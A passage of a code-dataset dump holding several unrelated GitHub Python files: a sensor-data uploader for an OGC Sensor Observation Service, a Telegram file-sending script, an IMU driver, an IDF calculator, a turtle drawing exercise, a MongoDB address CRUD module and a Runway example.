\"OM_GeometryObservation\",\r\n \"tho\": \"OM_TruthObservation\"}\r\n\r\n\r\ndef num(s): # Necessary to convert longitude and latitude from a string to a number.\r\n \"\"\"\r\n Convert string into a number (float or integer)\r\n :param s: string containing only digits\r\n :return: float or integer\r\n \"\"\"\r\n try:\r\n return int(s)\r\n except ValueError:\r\n return float(s)\r\n\r\n\r\ndef timeFromFile(filename=str):\r\n \"\"\"\r\n Extract the date and time which is part of a file name. Ex: 'data_stream-2016-07-21T135509.json'. Use when time is not reported for each sensor.\r\n :param filename: string which contains a date and time\r\n :return: time stamp in ISO format\r\n \"\"\"\r\n time_st = re.findall(r\"\\d\\d\\d\\d[-]\\d\\d[-]\\d\\d[T]\\d+\", filename)\r\n iso_time = time_st[0][:10] + \" \" + time_st[0][11:13] + \":\" + time_st[0][13:15] + \":\" + time_st[0][15:]\r\n\r\n return iso_time\r\n\r\n\r\ndef history(hist_directory):\r\n '''\r\n Opens a history file or creates a new one at root directory.\r\n A history file keeps a record of which sensors and observations have been processed\r\n File structure = {node: {count: int, latest: time_of_last_observation}}\r\n :param hist_directory: path to directory to store history files.\r\n :return: The newest history file in root directory OR\r\n an empty history file\r\n '''\r\n\r\n os.chdir(hist_directory) # set Windows directory\r\n\r\n try:\r\n # load latest modified history file\r\n newest = max(glob.iglob('*.json'), key=os.path.getmtime)\r\n his = open(newest)\r\n pool = json.load(his)\r\n his.close()\r\n # when no history file is found\r\n except ValueError: # on empty directory\r\n # raise message\r\n print('------------------------------------')\r\n print('WARNING!:')\r\n print('Empty directory for history files')\r\n print('Starting new record')\r\n print('------------------------------------')\r\n pool = {} # start an empty dictionary for history\r\n return pool\r\n\r\n\r\ndef loadData(root_directory, file_name, nest='markers'):\r\n '''\r\n Opens and reads a json file in the root directory\r\n :param root_directory: path to directory containing json files.\r\n :param file_name: file name\r\n :param nest: key name of the most upper object in the JSON file, which is an array. Default 'markers'\r\n :return: dictionary containing json objects\r\n '''\r\n # open file\r\n with open(root_directory + file_name) as f:\r\n jdata = json.load(f)\r\n jdata = jdata[nest]\r\n return jdata\r\n\r\n\r\ndef cleanData(objectlist, has_tag=str, time_attrib=True):\r\n \"\"\"\r\n Check if objects in a list contains elements: 'id', georeference, valid time and tags.\r\n :param objectlist: a list containing valid JSON objects. As returned by loadData function.\r\n :param has_tag: objects with this tag name will be kept. The rest will be removed.\r\n :param time_attrib: When True a time attribute check will be ignored.\r\n :return: a list of json objects\r\n \"\"\"\r\n # counter for removed objects\r\n i = 0\r\n cleanList = []\r\n for o in objectlist:\r\n # Keep objects with key 'id' and tag = has_tag\r\n # Keep objects with georeference, e.g. 'longitude' not null and 'longitude'/'latitude' is not zero.\r\n if ('id' in o\r\n and o[\"longitude\"] is not None and\r\n o[\"tags\"] == has_tag and\r\n num(o[\"longitude\"]) != 0.0 and\r\n num(o[\"latitude\"]) != 0.0):\r\n # filter based on valid time.\r\n if time_attrib is True:\r\n try:\r\n if 'Last update' in o:\r\n reported_time = o['Last update'] # reported time\r\n else:\r\n reported_time = o['LastValue'] # Another key for time (in waste collector)\r\n except KeyError: # When object has not this key\r\n print(\"*** Object has no 'Time' attribute ***\")\r\n continue # Go to the next object\r\n else: # if object has time attribute\r\n # Filter zero time\r\n if reported_time != '0000-00-00 00:00:00': # Sensors/observations will be added\r\n # only when objects hold a valid time\r\n cleanList.append(o) # add to clean list.\r\n else: # when time attribute is false\r\n cleanList.append(o)\r\n else:\r\n # print('------------------------')\r\n # print(\"!!!No 'id' name in object: \" + str(i))\r\n # print('------------------------')\r\n i += 1 # increase counter\r\n print(str(i) + ' Objects were removed!')\r\n\r\n return cleanList\r\n\r\n\r\nclass Sos():\r\n def __init__(self, url, token=''):\r\n self.sosurl = str(url) # url to access the SOS\r\n self.token = str(token) # security token, optional\r\n # Test if URL exists\r\n try:\r\n test = requests.get(self.sosurl)\r\n # TODO: test for token authorization\r\n test.raise_for_status()\r\n except requests.HTTPError:\r\n print(\"The URL is not valid\")\r\n\r\n\r\ndef upload_directory2sos(sos, directory, sensor_type, history_path, threads=1, time_attribute=True,\r\n spatial_profile=True):\r\n \"\"\"\r\n Parses all JSON files in a directory, prepares SOS requests for registering sensors and observations, and uploads data to an existing SOS.\r\n Application is limited by an intense use of memory when a directory contains a very large number of files.\r\n The use of multi-thread may crash the SOS. To limit the number of crashes, the function will stop for 20 seconds every after every 50 files.\r\n :param sos: Object describing an existing SOS with valid URL and token.\r\n :param directory: path to the directory which contains a JSON file.\r\n :param sensor_type: the type of sensors for which requests will be prepare (e.g., 'light', 'weather_station', etc.)\r\n :param history_path: path to directory for history logs\r\n :param threads: number of threads for multi-thread uploading. Default is 1 thread.\r\n :param time_attribute: states if specific sensor type contains a time attribute or not. Default is True.\r\n :param spatial_profile: switches between the use of insertObservationSP (True) to insertObservation (False).\r\n :return: None\r\n \"\"\"\r\n\r\n json_files = os.listdir(directory) # list all files in directory\r\n counter = 0 # initiate counter for monitoring progress\r\n start_time = datetime.datetime.now()\r\n print('=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/')\r\n print('Process stated at: ', str(start_time))\r\n print('PROCESSING all files in directory: ', directory)\r\n\r\n for f in sorted(json_files): # loop over json files. Files sorted by name.\r\n print('---->>Working on file: ', f)\r\n print(' >> Parsing file ', str(counter + 1), ' out of: ', str(len(json_files)))\r\n print('----------------------------------------------------------')\r\n # Load data from JSON file and prepare requests\r\n request_collection = requests_from_file(directory, f, sensor_type, history_path, time_attribute,\r\n spatial_profile)\r\n\r\n upload2sos(sos, request_collection, history_path, threads)\r\n counter += 1\r\n\r\n # Put the program to sleep after processing 'n' files.\r\n n = 50\r\n if counter > 0 and (counter % n) == 0:\r\n wait_time = 20 # time in seconds\r\n # print('=============================================')\r\n print('\\n >>> The monkey is tired <<< ')\r\n print(' ********************* ')\r\n print(' ** ** ')\r\n print(' ** GETTING MORE ** ')\r\n print(' ** BANANAS ** ')\r\n print(' ** ** ')\r\n print(' ********************* ')\r\n print(' >>> Wait ', wait_time, ' seconds ', ' <<< ')\r\n # print('=============================================')\r\n time_.sleep(wait_time)\r\n else:\r\n pass\r\n\r\n end_time = datetime.datetime.now()\r\n elapse_t = end_time - start_time\r\n print('------------------------------')\r\n print('>> Directory Upload Complete <<')\r\n print('-> Total upload time: ' + str(elapse_t))\r\n print('------------------------------')\r\n\r\n return None\r\n\r\n\r\ndef requests_from_file(directory, file_name, sensor_type, hist_path, time_attrib=True, spatial_profile=True):\r\n \"\"\"\r\n Parse a single JSON file and prepare SOS requests for registering sensors and observations.\r\n\r\n :param directory: path to the directory which contains a JSON file\r\n :param file_name: name of a JSON file containing sensor data\r\n :param sensor_type: the type of sensors for which requests will be prepare (e.g., 'light', 'weather_station', etc.)\r\n :param hist_path: path to directory for history logs\r\n :param time_attrib: states if specific sensor type contains a time attribute or not. Default is True.\r\n :param spatial_profile: switches between the use of insertObservationSP (True) to insertObservation (False).\r\n :return: a list of valid requests, and up-to-date history log\r\n \"\"\"\r\n\r\n print('=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/')\r\n print('PROCESSING a single file: ', file_name)\r\n print('----------------------------------------------------------')\r\n\r\n jdata = loadData(directory, file_name)\r\n\r\n # ------------------------------\r\n # Parsing Parameters:\r\n # ------------------------------\r\n # sensor type\r\n type_sensor = wrapper.SensorType(sensor_type)\r\n sensor_attrib = type_sensor.pattern['attributes']\r\n # parsing history\r\n hist = history(hist_path)\r\n # Remove invalid objects\r\n # print(type_sensor.pattern['name'])\r\n clean_obj = cleanData(jdata, type_sensor.pattern['name'], time_attrib)\r\n\r\n # Chose Insert Observation function:\r\n if spatial_profile is True:\r\n insertobservation = transactional.insertObservationSP # with Transactional Profile\r\n else:\r\n insertobservation = transactional.insertObservation # without it\r\n\r\n # Chose Inser Sensor function:\r\n if type_sensor.pattern['type'] == 'mobile':\r\n insertsensor = transactional.insertMobileSensor\r\n else:\r\n insertsensor = transactional.insertSensor\r\n\r\n prepared_requests = [] # request collector\r\n for o in clean_obj: # loop over each object in input file\r\n ide = o['id']\r\n if ide in hist:\r\n # if node was previously processed\r\n # fetch time:\r\n if time_attrib:\r\n t = o['Last update']\r\n else:\r\n # TODO: time needs transformation wrt server-time\r\n t = timeFromFile(file_name) # get time form file name\r\n\r\n if t not in hist[str(ide)][\"times\"]: # check if object has new time\r\n # change time format\r\n tt = t.split()\r\n time = tt[0] + 'T' + tt[1] + '+00:00'\r\n body = wrapper.Batch(ide) # initiate batch instance\r\n\r\n for a in sensor_attrib: # loop over each attribute\r\n\r\n # OM type\r\n om = type_sensor.om_types[a[1]]\r\n # define procedure\r\n procedure = wrapper.Procedure(ide, a[0], 'http://www.geosmartcity.nl/test/observableProperty/', om)\r\n off_name = 'offering for ' + ide + '_' + type_sensor.pattern['name']\r\n # WARNING: defining an offering for each node\r\n offering = wrapper.Offering('http://www.geosmartcity.nl/test/offering/', ide, off_name)\r\n # Indexing observation identifier\r\n # Index := ide_count+1\r\n new_ide = ide + '_' + \"\".join(a[0].split()) + '_' + str(\r\n hist[ide]['count'] + 1) # ID like: ide_(count +1)\r\n\r\n observation = wrapper.Observation(new_ide)\r\n observation.uom = om\r\n observation.phTime, observation.rTime = time, time # same time for both\r\n # fetch observation value\r\n\r\n # Skip 'Location' attribute\r\n if a[1] != \"go\":\r\n\r\n # Get value for attribute in TypeSensor object\r\n try:\r\n val = str(o[a[0]])\r\n # get numeric value\r\n except KeyError: # when key doesn't exits in object\r\n continue # Skip request for this attribute\r\n val_num = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", val)\r\n\r\n # change to float data type\r\n if len(\r\n val_num) == 0: # Node attribute had not data, or reported an empty (regarded as Null) value.\r\n print('Empty val_num for: ' + str(ide))\r\n if om == \"OM_Measurement\":\r\n observation.Value = -9.99 # alternative 'null' value for 'float' types\r\n elif om == \"OM_CountObservation\":\r\n observation.Value = -1111 # alternative 'null' value for 'integer' type\r\n else: # TODO: add more alternative values\r\n continue\r\n # Fetch magnitude\r\n unit = ''.join([i for i in val if not i.isdigit()])\r\n for character in [\" \", \".\", \"-\"]:\r\n unit = unit.replace(character, \"\")\r\n observation.unit = unit\r\n else:\r\n observation.Value = num(val_num[0]) # value of the observation\r\n # Fetch magnitud for the value:\r\n # observation.unit = re.sub((val_num[0] + ' '), \"\", val, count=1)\r\n unit = ''.join([i for i in val if not i.isdigit()])\r\n for character in [\" \", \".\", \"-\"]:\r\n unit = unit.replace(character, \"\")\r\n observation.unit = unit\r\n\r\n else: # For goemetry observation\r\n observation.Value = None\r\n observation.unit = None\r\n\r\n # feature of interest:\r\n coord = (float(o['longitude']), float(o['latitude']), -9.99) # No data := -9.99\r\n foi = wrapper.FoI('degree', 'm', coord, ide)\r\n # prepare body request\r\n if type_sensor.pattern[\"type\"] == \"mobile\":\r\n body_obs = insertobservation(observation, foi, offering, procedure, a[0])\r\n else:\r\n body_obs = insertobservation(observation, foi, offering, procedure, a[0])\r\n body.add_request(body_obs) # collect insert observation request\r\n\r\n prepared_requests.append(body)\r\n\r\n # After insert observation (parsing) is successful\r\n # update sensor history\r\n old_val = hist[ide][\"count\"]\r\n hist[ide][\"count\"] = old_val + 1 # update counter\r\n hist[ide][\"times\"].append(t) # store new time\r\n else:\r\n continue\r\n\r\n else:\r\n # if node is new in hist\r\n # insert sensor to SOS\r\n # print('NEW ' + type_sensor.pattern['name'] + ' SENSOR for: ' + str(ide))\r\n # phenomena / result time:\r\n if time_attrib:\r\n try:\r\n t = o['Last update']\r\n except KeyError:\r\n t = o['LastValue'] # special case (waste collector)\r\n\r\n else:\r\n # TODO: time needs transformation wrt server-time\r\n t = timeFromFile(file_name) # get time form file name\r\n\r\n # change time format\r\n tt = t.split()\r\n time = tt[0] + 'T' + tt[1] + '+00:00'\r\n\r\n body_sensor = \"\"\r\n\r\n # Start batch instance\r\n body = wrapper.Batch(ide)\r\n\r\n # Prepare Sensor Registration:\r\n for a in sensor_attrib:\r\n\r\n # OM type\r\n om = type_sensor.om_types[a[1]]\r\n # print(type_sensor.om_types[a[1]])\r\n\r\n # define procedure\r\n procedure = wrapper.Procedure(ide, a[0], 'http://www.geosmartcity.nl/test/observableProperty/', om)\r\n off_name = 'offering for ' + ide + '_' + type_sensor.pattern['name']\r\n # WARNING: defining an offering for each node\r\n offering = wrapper.Offering('http://www.geosmartcity.nl/test/offering/', ide, off_name)\r\n\r\n # feature of interest:\r\n try:\r\n coord = (float(o['longitude']), float(o['latitude']), -9.99) # No data := -9.99\r\n except TypeError:\r\n print(o)\r\n\r\n # Feature of interest\r\n foi = wrapper.FoI('degree', 'm', coord, ide)\r\n\r\n # prepare body for insert sensor\r\n body_sensor = insertsensor(offering, procedure, foi, type_sensor)\r\n body.add_request(body_sensor) # append insert sensor request\r\n\r\n # Prepare Insert Observation Requests:\r\n cuenta = 0\r\n\r\n for a in sensor_attrib:\r\n # OM type\r\n om = type_sensor.om_types[a[1]]\r\n # define procedure\r\n procedure = wrapper.Procedure(ide, a[0], 'http://www.geosmartcity.nl/test/observableProperty/', om)\r\n off_name = 'offering for ' + ide + '_' + type_sensor.pattern['name']\r\n # WARNING: defining an offering for each node\r\n offering = wrapper.Offering('http://www.geosmartcity.nl/test/offering/', ide, off_name)\r\n\r\n # Indexing observation identifier\r\n new_ide = ide + '_' + \"\".join(a[0].split()) + '_1' # ID like: ide_(count +1)\r\n # print(\"id: \"+new_ide)\r\n observation = wrapper.Observation(new_ide)\r\n observation.uom = om\r\n observation.phTime, observation.rTime = time, time # same time for both\r\n\r\n # Skip 'Location' attribute\r\n if a[1] != \"go\":\r\n\r\n # fetch observation value\r\n try: # Avoid stop, when sensor type report different attributes\r\n val = str(o[a[0]])\r\n # get numeric value\r\n except KeyError:\r\n # print('Sensor without this attribute..!!!' + ' Sensor: ' + str(ide) +' attribute: ' + str(a))\r\n continue\r\n val_num = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", val)\r\n # change to float data type\r\n # print(\"type of measurement:\", om)\r\n if len(val_num) == 0:\r\n print('Empty val_num for: ' + str(ide))\r\n if om == \"OM_Measurement\":\r\n observation.Value = -9.99 # alternative 'null' value for 'float' data type in Database\r\n elif om == \"OM_CountObservation\":\r\n observation.Value = -1111 # alternative 'null' value for 'integer' data type in Database\r\n else: # TODO: add more alternative values\r\n continue\r\n # Fetch magnitude\r\n # When No magnitude an empty string is returned.\r\n unit = ''.join([i for i in val if not i.isdigit()])\r\n for character in [\" \", \".\", \"-\"]:\r\n unit = unit.replace(character, \"\")\r\n # print(\"unit at: \", o[\"id\"], \" for \", a, \" is: \", unit)\r\n observation.unit = unit # val should contain only the magnitud\r\n\r\n else:\r\n observation.Value = num(val_num[0]) # value of the observation\r\n # Fetch magnitud for the value:\r\n # observation.unit = re.sub((val_num[0] + ' '), \"\", val, count=1)\r\n unit = ''.join([i for i in val if not i.isdigit()])\r\n for character in [\" \", \".\", \"-\"]:\r\n unit = unit.replace(character, \"\")\r\n # print(\"unit at: \", o[\"id\"], \" for \", a, \" is: \", unit)\r\n observation.unit = unit\r\n else: # For goemetry observation\r\n observation.Value = None\r\n observation.unit = None\r\n\r\n # feature of interest:\r\n coord = (float(o['longitude']), float(o['latitude']), -9.99) # No data := -9.99\r\n foi = wrapper.FoI('degree', 'm', coord, ide)\r\n\r\n # insert observation to SOS\r\n if type_sensor.pattern[\"type\"] == \"mobile\":\r\n # TODO: modify insert sensor function for mobile sensors\r\n body_obs = insertobservation(observation, foi, offering, procedure, a[\r\n 0]) # TODO: Fix, this will produce an error if a mobile sensor is declared\r\n else:\r\n body_obs = insertobservation(observation, foi, offering, procedure, a[0])\r\n body.add_request(body_obs) # add observation request\r\n cuenta += 1\r\n prepared_requests.append(body)\r\n\r\n # After sensor and observation are successful\r\n # Update sensor history with new record\r\n\r\n hist[ide] = {\"count\": 1, \"times\": [t]}\r\n\r\n # insert parsing history. TODO: Is this necessary?\r\n # hist[\"last parsed\"] = {\"runtime error\": {}, \"file name\" : '', \"run time\": ''}\r\n\r\n return {\"requests\": prepared_requests, \"history\": hist, \"file\": file_name}\r\n\r\n\r\ndef upload2sos(sos, request_collection, hist_path, threads=1):\r\n \"\"\"\r\n Upload data to a SOS using HTTP POST requests\r\n :param sos: Object describing an existing SOS\r\n :param request_collection: dictionary containing: HTTP requests, historic log, and name parsed file. Each request is an instance of Batch class\r\n :param hist_path: directory in which the history log files will be saved\r\n :param threads: number of threads for multi-thread uploading. Default is 1 thread.\r\n :return: None\r\n \"\"\"\r\n # TODO: currently it work for a single file (a list of Batch objects). Estend it to deal with multiple files and including a 'sleep' time might not be of practical case.\r\n # If new requests were created\r\n err_log = {} # initiate error log\r\n num_posts = len(request_collection['requests']) # number of requests\r\n hist = request_collection['history']\r\n file_name = request_collection['file']\r\n re_quests = request_collection['requests']\r\n\r\n start_time = datetime.datetime.now()\r\n\r\n if num_posts > 0:\r\n # send requests\r\n print('-----------------------------')\r\n print('UPLOADING DATA TO: ' + sos.sosurl)\r\n print('SENDING ', str(num_posts), ' REQUESTS...', 'Using:', str(threads), 'threads')\r\n print('WARNING: Uploading redundant data won\"t be flagged', '...working to fix it...')\r\n # wrapper.sosPost(my_requests[count].reqs(), url, token, response=False)\r\n # my_requests.clear()\r\n # count += 1\r\n\r\n with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:\r\n future_to_req = {executor.submit(wrapper.sosPost, reques.reqs(), sos.sosurl, sos.token, True): reques for\r\n reques in re_quests}\r\n for future in concurrent.futures.as_completed(future_to_req):\r\n req = future_to_req[future] # Batch instances\r\n # print(future.result())\r\n try:\r\n # TODO: server is not reporting errors when sending redundant data. Check sosPost as well.\r\n # # print('hello')\r\n future.result()\r\n # # future.result()\r\n except Exception as exc:\r\n future.exception()\r\n err_log[str(datetime.datetime.now())] = [req.id, exc, req.body]\r\n print('%r generated an exception: %s Request: %s' % (req.id, exc, req.body))\r\n\r\n e_time = datetime.datetime.now()\r\n\r\n wait = e_time - start_time\r\n reqs_per_post = len(re_quests) # an aproximation\r\n # print('Upload time: ', file_name, str(wait), )\r\n print('SOS server load: ', str(round(reqs_per_post / wait.total_seconds(), 1)), 'Rps')\r\n # print('Accumulated time: ', str(datetime.datetime.now() - start_time))\r\n print('------------------------------')\r\n request_collection.clear()\r\n # count += 1\r\n\r\n # update history log file:\r\n updateHistory(hist_path, file_name, hist, err_log)\r\n\r\n # report not new requests were send\r\n else:\r\n print(\"*** No NEW sensors nor NEW observations in file %r ***\" % file_name)\r\n # count += 1\r\n\r\n # Create error log file if any error are reported during uploading\r\n if len(err_log) > 0:\r\n # file name\r\n efile = 'runtime-errors' + datetime.datetime.now().strftime(\"%Y-%m-%dT%H%M%S\") + '.log'\r\n ef = open(hist_path + efile, 'w') # save to same directory as history log files\r\n json.dump(err_log, ef)\r\n ef.close()\r\n\r\n end_time = datetime.datetime.now()\r\n elapse_t = end_time - start_time\r\n print('------------------------------')\r\n print('File Upload Complete')\r\n print('Upload time: ' + str(elapse_t))\r\n print('------------------------------')\r\n\r\n return None\r\n\r\n\r\ndef updateHistory(hist_path, file_name, latest_history_log, error_log):\r\n \"\"\"\r\n Updates the history log of requests sent to the SOS server. It writes a new file containing the latest changes to a local directory.\r\n If errors in he server occurred, an error log will be added to the history file\r\n :param hist_path: path a directory to store the new (updated) history log file\r\n :param file_name: name of the source file which is uploading.\r\n :param latest_history_log: up to date history log, formatted as JSON\r\n :param error_log: error reports. Formatted as JSON\r\n :return: new history log file formatted as JSON\r\n \"\"\"\r\n hist = latest_history_log\r\n hist['last upload'] = {\"name\": file_name, \"run time\": str(datetime.datetime.now()), \"runtime error\": error_log}\r\n fname = 'hist-' + datetime.datetime.now().strftime(\"%Y-%m-%dT%H%M%S\") + '.json'\r\n fn = open(hist_path + fname, 'w') # create new history file\r\n json.dump(hist, fn) # write to file\r\n fn.close()\r\n print(\"History log file was updated!!\")\r\n return None\r\n\r\n# TODO: URI from waste sensors are not valid. They contain spaces and special characters. They have to be remove\r\n\r\n\r\ndef main():\r\n\r\n # TODO: Write some tests\r\n # dir = 'c:/sos_santander/raw_data/sample/'\r\n # f_name = \"santander_example_data.json\"\r\n # f_name2 = \"data_stream-2016-07-01T080007.json\"\r\n # h_dir = 'c:/Temp/hist_temp/'\r\n\r\n url = 'http://xx.xx.xx.xxxx:8080/sos-4.4/service'\r\n token = 'TWFudWVsIEdhcmNpYQ=='\r\n # rq = requests_from_file(dir, f_name, 'bus', h_dir, time_attrib=True)\r\n\r\n # r = rq[\"requests\"][0]\r\n # print(r.reqs())\r\n\r\n sos = Sos(url, token)\r\n\r\n # upload2sos(sos, rq, h_dir, 3)\r\n\r\n # upload_directory2sos(sos, dir, 'light', h_dir,3)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"manuGil/py4sos","sub_path":"py4sos/santander.py","file_name":"santander.py","file_ext":"py","file_size_in_byte":29243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"27059874618","text":"import asyncio\nimport os\n\nimport requests\nfrom pyrogram import Client\nfrom environs import Env\nfrom sys import argv\nimport sys\nfrom os import remove\nfrom re import match\nfrom requests import get\nfrom urllib import parse\nimport json\nimport time\n\nenv = Env()\nenv.read_env()\n\ndata = json.loads(open(\"./media/sendFile/data.json\", \"r\").read())\n\nchat_id = data['chat_id']\ncaption = data['caption']\nfileType = data['fileType']\ntoken = data['token']\nurl = str(data['url'])\ncallback_url = str(data['callback_url'])\n\nex = url.split(\".\")[-1]\n\nfile_name = f\"media/sendFile/{time.time() * 1000}.{ex}\"\n\nwith open(file_name, \"wb\") as f:\n print(\"Downloading %s\" % url)\n response = requests.get(url, stream=True)\n total_length = response.headers.get('content-length')\n d1 = ''\n d2 = ''\n if total_length is None: # no content length header\n f.write(response.content)\n else:\n dl = 0\n total_length = int(total_length)\n start_time = round(time.time())\n for data in response.iter_content(chunk_size=4096):\n f.write(data)\n dl += len(data)\n now_time = round(time.time())\n if (now_time - 3) >= start_time:\n\n start_time = now_time\n\n d1 = round(dl / (1024 * 1024), 2)\n d2 = round(total_length / (1024 * 1024), 2)\n\n done = int(50 * int(d1) / int(d2))\n sys.stdout.write(\"\\r[%s%s]\" % ('=' * done, ' ' * (50 - done)))\n sys.stdout.flush()\n\n if match(r\"^(.*)\\?(.*)=(.*)$\", callback_url):\n get(f\"{callback_url}&down={d1}&size={d2}&status=downloading\")\n else:\n get(f\"{callback_url}?down={d1}&size={d2}&status=downloading\")\n get(f\"{callback_url}?down={d1}&size={d2}&status=downloaded\")\n\n\ndef progress(down, size):\n down = round(down / (1024 * 1024), 2)\n size = round(size / (1024 * 1024), 2)\n done = int(50 * int(down) / int(size))\n sys.stdout.write(\"\\r[%s%s]\" % ('=' * done, ' ' * (50 - done)))\n sys.stdout.flush()\n\n if match(r\"^(.*)\\?(.*)=(.*)$\", callback_url):\n get(f\"{callback_url}&send={down}&size={size}&status=progress\")\n else:\n get(f\"{callback_url}?send={down}&size={size}&status=progress\")\n\n\nasync def main(file):\n async with Client(\"bot\", api_id=env.int(\"api_id\"), api_hash=env.str(\"api_hash\"), bot_token=token) as app:\n # Send a message, Markdown is enabled by default\n\n if fileType == \"video\":\n res = await app.send_video(chat_id=chat_id, caption=caption, video=file, progress=progress)\n elif fileType == \"audio\":\n res = await app.send_audio(chat_id=chat_id, caption=caption, audio=file, progress=progress)\n elif fileType == \"document\":\n res = await app.send_document(chat_id=chat_id, caption=caption, document=file, progress=progress)\n elif fileType == \"photo\":\n res = await app.send_photo(chat_id=chat_id, caption=caption, photo=file, progress=progress)\n else:\n return []\n return res\n\n\nloop = asyncio.get_event_loop()\n\nloop.run_until_complete(main(file=file_name))\n\nos.remove(file_name)\n\nif match(r\"^(.*)\\?(.*)=(.*)$\", callback_url):\n get(f\"{callback_url}&status=finish\")\nelse:\n get(f\"{callback_url}?status=finish\")","repo_name":"ExcelentProgrammer/api","sub_path":"sendFile/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"14868630528","text":"import struct\nimport pyb\n\n\nSCL = pyb.Pin(pyb.Pin.cpu.B8)\nSDA = pyb.Pin(pyb.Pin.cpu.B9)\n\n\nclass BNO055:\n def __init__(self, addr,i2c):\n self.addr = addr\n self.i2c = i2c\n self.changeMode(0x00)\n self.changeMode(0x0C)\n\n \n def changeMode(self, data):\n self.i2c.mem_write(data,self.addr, 0x3D)\n \n def getCalibStatus(self):\n buf = bytearray(1)\n self.i2c.mem_read(buf,self.addr, 0x35)\n \n cal_status = ( buf[0] & 0b11,\n (buf[0] & 0b11 << 2) >> 2,\n (buf[0] & 0b11 << 4) >> 4,\n (buf[0] & 0b11 << 6) >> 6)\n return cal_status\n \n def getCalibCoef(self):\n buf = bytearray(22)\n self.i2c.mem_read(buf,self.addr, 0x55)\n return buf\n \n \n def writeCalibCoef(self, data):\n self.i2c.mem_write(data,self.addr, 0x55)\n \n def readEuler(self):\n buf = bytearray(6)\n self.i2c.mem_read(buf, self.addr, 0x1A)\n eul_signed_ints = struct.unpack(' 0:\n word2IDF[key] = idf\n\nword2IDF = sorted(word2IDF.items(), key=lambda kv: kv[1])#, reverse=True)\n\nidf_file = '{}/data/{}/idf_files/idf.txt'.format(PROJECT_FOLDER, DATASET)\nwith open(idf_file, 'w') as fout:\n for t in word2IDF:\n if t[0] in STOPWORDS or t[0] in PUNCS:\n continue\n fout.write('{}\\t{}\\t{}\\n'.format(t[0], t[1], word2freq[t[0]]))\n","repo_name":"ellenmellon/CGRG","sub_path":"prepare_data/compute_idf_dstc.py","file_name":"compute_idf_dstc.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"91"}
+{"seq_id":"33036632209","text":"# მანდალის ფუძის ხატვა\n\nimport turtle\n\ns = turtle.getscreen()\nt = turtle.Turtle()\n\n# ეკრანის კონფიგურაცია\ns.title('ფერადი ფიგურების ხატვა')\ns.setup(960, 600)\ns.bgcolor('DarkOrchid')\n\n# მოძრავი კუს კონფიგურაცია\nt.speed(7)\nt.pencolor('DarkSlateBlue')\nt.fillcolor('lime')\n\n\n\n\n\n\n\n# =============\n# turtle.ht()\n# t.ht()\n\nturtle.exitonclick()\n","repo_name":"pm72/199-SCHOOL","sub_path":"2021-2022/7_5/I სემესტრი/010 (12.7.21)/color_figures.pyw","file_name":"color_figures.pyw","file_ext":"pyw","file_size_in_byte":495,"program_lang":"python","lang":"ka","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"42681070378","text":"from src.models.address import (\n create_first_address,\n add_address,\n get_address,\n get_user_address,\n remove_address\n)\nfrom src.models.user import get_user_by_email\nfrom src.server.database import connect_db, db, disconnect_db\n\nfrom bson.objectid import ObjectId\n\nasync def addresses_crud():\n option = input(\"Entre com a opção de CRUD: \")\n \n await connect_db()\n addresses_collection = db.addresses_collection\n users_collection = db.users_collection\n\n address = {\n \"street\": \"Rua Quarenta e Sete, Numero 3\",\n \"cep\": \"8465312\",\n \"district\": \"Mato Grosso\",\n \"city\": \"Cuiabá\",\n \"state\": \"MT\",\n \"is_delivery\": True\n }\n\n _id = ObjectId(\"6333edd7e66aa37f2fc806c8\")\n user_email = \"lu_domagalu@gmail.com\"\n\n if option == '1':\n # create address\n user = await get_user_by_email(\n users_collection,\n user_email\n )\n\n check_address = await get_user_address(\n addresses_collection,\n user\n )\n print(check_address)\n\n if check_address:\n new_address = await add_address(\n addresses_collection,\n user,\n address\n )\n\n else:\n first_address = await create_first_address(\n addresses_collection,\n user,\n address\n )\n\n elif option == '2':\n # get address by id\n address = await get_address(\n addresses_collection,\n _id\n )\n print(address)\n\n elif option == '3':\n # get address by user \n user = await get_user_by_email(\n users_collection,\n user_email\n )\n address = await get_user_address(\n addresses_collection,\n user\n )\n print(address)\n\n elif option == '4':\n # delete\n result = await remove_address(\n addresses_collection,\n _id,\n )\n print(result)\n\n await disconnect_db()\n","repo_name":"julianakemi/shopping-cart-database","sub_path":"src/controllers/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18402862815","text":"import runway\nfrom runway.data_types import array, text\n\n@runway.setup(options={ \"seed_sentences\": array(item_type=text, min_length=5) })\ndef setup(opts):\n for i in range(5):\n print(\"Sentence {} is \\\"{}\\\"\".format(i+1, opts[\"seed_sentences\"][i]))\n\nrunway.run()\n\n# curl -H \"content-type: application/json\" -d '{\"seed_sentences\": [\"the\", \"sly\", \"fox\", \"is\", \"sly\"]}' http://localhost:9000/setup","repo_name":"runwayml/model-sdk","sub_path":"examples/docs_code_snippets/data_types_array.py","file_name":"data_types_array.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"91"}
